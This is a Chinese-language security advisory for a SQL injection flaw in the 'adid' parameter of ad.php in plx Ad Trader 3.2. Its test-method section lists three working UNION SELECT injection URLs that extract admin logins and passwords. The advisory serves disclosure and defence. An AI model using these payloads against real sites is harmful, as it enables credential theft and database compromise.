BUGTRAQ ID: 30046
CNCAN ID：CNCAN-2008070302
 
漏洞消息时间:2008-07-02
 
漏洞起因
输入验证错误
 
影响系统
plx Web Studio Ad Trader 3.2
 
不受影响系统
 
危害
远程攻击者可以利用漏洞进行SQL注入攻击，可能获得敏感信息或操作数据库。
 
攻击所需条件
攻击者必须访问plx Ad Trader。
 
漏洞信息
plx Ad Trader是一款基于PHP的WEB应用程序。
plx Ad Trader不正确处理用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，可能获得敏感信息或操作数据库。
问题由于'ad.php'脚本对用户提交给'adid'参数缺少过滤，构建恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。
 
测试方法
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins--
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
 
厂商解决方案
目前没有解决方案提供：
http://plxwebdev.com/script/ad_trader/
 
漏洞提供者
Hussin X
 
漏洞消息链接
http://www.securityfocus.com/bid/30046/
 
漏洞消息标题
plx Ad Trader 'ad.php' SQL Injection Vulnerability